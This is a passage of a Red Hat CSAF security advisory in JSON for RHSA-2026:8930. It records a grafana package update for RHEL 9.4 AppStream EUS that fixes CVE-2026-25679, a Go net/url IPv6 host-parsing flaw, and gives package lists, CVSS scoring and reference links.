Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. \n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:8930", "url": "https://access.redhat.com/errata/RHSA-2026:8930"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8930.json"}], "title": "Red Hat Security Advisory: grafana security update", "tracking": {"current_release_date": "2026-06-08T15:52:48+00:00", "generator": {"date": "2026-06-08T15:52:48+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:8930", "initial_release_date": "2026-04-20T09:35:55+00:00", "revision_history": [{"date": "2026-04-20T09:35:55+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-20T09:35:55+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:48+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product": {"name": "Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_eus:9.4::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "grafana-0:9.2.10-26.el9_4.src", "product": {"name": "grafana-0:9.2.10-26.el9_4.src", "product_id": "grafana-0:9.2.10-26.el9_4.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@9.2.10-26.el9_4?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "grafana-0:9.2.10-26.el9_4.aarch64", "product": {"name": "grafana-0:9.2.10-26.el9_4.aarch64", "product_id": "grafana-0:9.2.10-26.el9_4.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@9.2.10-26.el9_4?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-selinux-0:9.2.10-26.el9_4.aarch64", "product": {"name": "grafana-selinux-0:9.2.10-26.el9_4.aarch64", "product_id": "grafana-selinux-0:9.2.10-26.el9_4.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-selinux@9.2.10-26.el9_4?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-debugsource-0:9.2.10-26.el9_4.aarch64", "product": {"name": "grafana-debugsource-0:9.2.10-26.el9_4.aarch64", "product_id": "grafana-debugsource-0:9.2.10-26.el9_4.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debugsource@9.2.10-26.el9_4?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:9.2.10-26.el9_4.aarch64", "product": {"name": "grafana-debuginfo-0:9.2.10-26.el9_4.aarch64", "product_id": "grafana-debuginfo-0:9.2.10-26.el9_4.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@9.2.10-26.el9_4?arch=aarch64"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "grafana-0:9.2.10-26.el9_4.ppc64le", "product": {"name": "grafana-0:9.2.10-26.el9_4.ppc64le", "product_id": "grafana-0:9.2.10-26.el9_4.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@9.2.10-26.el9_4?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-selinux-0:9.2.10-26.el9_4.ppc64le", "product": {"name": "grafana-selinux-0:9.2.10-26.el9_4.ppc64le", "product_id": "grafana-selinux-0:9.2.10-26.el9_4.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-selinux@9.2.10-26.el9_4?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-debugsource-0:9.2.10-26.el9_4.ppc64le", "product": {"name": "grafana-debugsource-0:9.2.10-26.el9_4.ppc64le", "product_id": "grafana-debugsource-0:9.2.10-26.el9_4.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debugsource@9.2.10-26.el9_4?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:9.2.10-26.el9_4.ppc64le", "product": {"name": "grafana-debuginfo-0:9.2.10-26.el9_4.ppc64le", "product_id": "grafana-debuginfo-0:9.2.10-26.el9_4.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@9.2.10-26.el9_4?arch=ppc64le"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "grafana-0:9.2.10-26.el9_4.x86_64", "product": {"name": "grafana-0:9.2.10-26.el9_4.x86_64", "product_id": "grafana-0:9.2.10-26.el9_4.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@9.2.10-26.el9_4?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-selinux-0:9.2.10-26.el9_4.x86_64", "product": {"name": "grafana-selinux-0:9.2.10-26.el9_4.x86_64", "product_id": "grafana-selinux-0:9.2.10-26.el9_4.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-selinux@9.2.10-26.el9_4?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-debugsource-0:9.2.10-26.el9_4.x86_64", "product": {"name": "grafana-debugsource-0:9.2.10-26.el9_4.x86_64", "product_id": "grafana-debugsource-0:9.2.10-26.el9_4.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debugsource@9.2.10-26.el9_4?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:9.2.10-26.el9_4.x86_64", "product": {"name": "grafana-debuginfo-0:9.2.10-26.el9_4.x86_64", "product_id": "grafana-debuginfo-0:9.2.10-26.el9_4.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@9.2.10-26.el9_4?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}, {"branches": [{"category": "product_version", "name": "grafana-0:9.2.10-26.el9_4.s390x", "product": {"name": "grafana-0:9.2.10-26.el9_4.s390x", "product_id": "grafana-0:9.2.10-26.el9_4.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@9.2.10-26.el9_4?arch=s390x"}}}, {"category": "product_version", "name": "grafana-selinux-0:9.2.10-26.el9_4.s390x", "product": {"name": "grafana-selinux-0:9.2.10-26.el9_4.s390x", "product_id": "grafana-selinux-0:9.2.10-26.el9_4.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-selinux@9.2.10-26.el9_4?arch=s390x"}}}, {"category": "product_version", "name": "grafana-debugsource-0:9.2.10-26.el9_4.s390x", "product": {"name": "grafana-debugsource-0:9.2.10-26.el9_4.s390x", "product_id": "grafana-debugsource-0:9.2.10-26.el9_4.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debugsource@9.2.10-26.el9_4?arch=s390x"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:9.2.10-26.el9_4.s390x", "product": {"name": "grafana-debuginfo-0:9.2.10-26.el9_4.s390x", "product_id": "grafana-debuginfo-0:9.2.10-26.el9_4.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@9.2.10-26.el9_4?arch=s390x"}}}], "category": "architecture", "name": "s390x"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "grafana-0:9.2.10-26.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.aarch64"}, "product_reference": "grafana-0:9.2.10-26.el9_4.aarch64", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:9.2.10-26.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.ppc64le"}, "product_reference": "grafana-0:9.2.10-26.el9_4.ppc64le", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:9.2.10-26.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.s390x"}, "product_reference": "grafana-0:9.2.10-26.el9_4.s390x", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:9.2.10-26.el9_4.src as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.src"}, "product_reference": "grafana-0:9.2.10-26.el9_4.src", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:9.2.10-26.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.x86_64"}, "product_reference": "grafana-0:9.2.10-26.el9_4.x86_64", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:9.2.10-26.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.aarch64"}, "product_reference": "grafana-debuginfo-0:9.2.10-26.el9_4.aarch64", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:9.2.10-26.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.ppc64le"}, "product_reference": "grafana-debuginfo-0:9.2.10-26.el9_4.ppc64le", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:9.2.10-26.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.s390x"}, "product_reference": "grafana-debuginfo-0:9.2.10-26.el9_4.s390x", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:9.2.10-26.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.x86_64"}, "product_reference": "grafana-debuginfo-0:9.2.10-26.el9_4.x86_64", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debugsource-0:9.2.10-26.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.aarch64"}, "product_reference": "grafana-debugsource-0:9.2.10-26.el9_4.aarch64", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debugsource-0:9.2.10-26.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.ppc64le"}, "product_reference": "grafana-debugsource-0:9.2.10-26.el9_4.ppc64le", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debugsource-0:9.2.10-26.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.s390x"}, "product_reference": "grafana-debugsource-0:9.2.10-26.el9_4.s390x", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debugsource-0:9.2.10-26.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.x86_64"}, "product_reference": "grafana-debugsource-0:9.2.10-26.el9_4.x86_64", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-selinux-0:9.2.10-26.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.aarch64"}, "product_reference": "grafana-selinux-0:9.2.10-26.el9_4.aarch64", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-selinux-0:9.2.10-26.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.ppc64le"}, "product_reference": "grafana-selinux-0:9.2.10-26.el9_4.ppc64le", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-selinux-0:9.2.10-26.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.s390x"}, "product_reference": "grafana-selinux-0:9.2.10-26.el9_4.s390x", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-selinux-0:9.2.10-26.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)", "product_id": "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.x86_64"}, "product_reference": "grafana-selinux-0:9.2.10-26.el9_4.x86_64", "relates_to_product_reference": "AppStream-9.4.0.Z.EUS"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.src", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.x86_64", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.x86_64", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.x86_64", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-20T09:35:55+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.src", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.x86_64", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.x86_64", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.x86_64", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:8930"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.src", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.x86_64", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.x86_64", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.x86_64", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.src", "AppStream-9.4.0.Z.EUS:grafana-0:9.2.10-26.el9_4.x86_64", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-debuginfo-0:9.2.10-26.el9_4.x86_64", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-debugsource-0:9.2.10-26.el9_4.x86_64", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.aarch64", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.ppc64le", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.s390x", "AppStream-9.4.0.Z.EUS:grafana-selinux-0:9.2.10-26.el9_4.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:8930"}]}}}]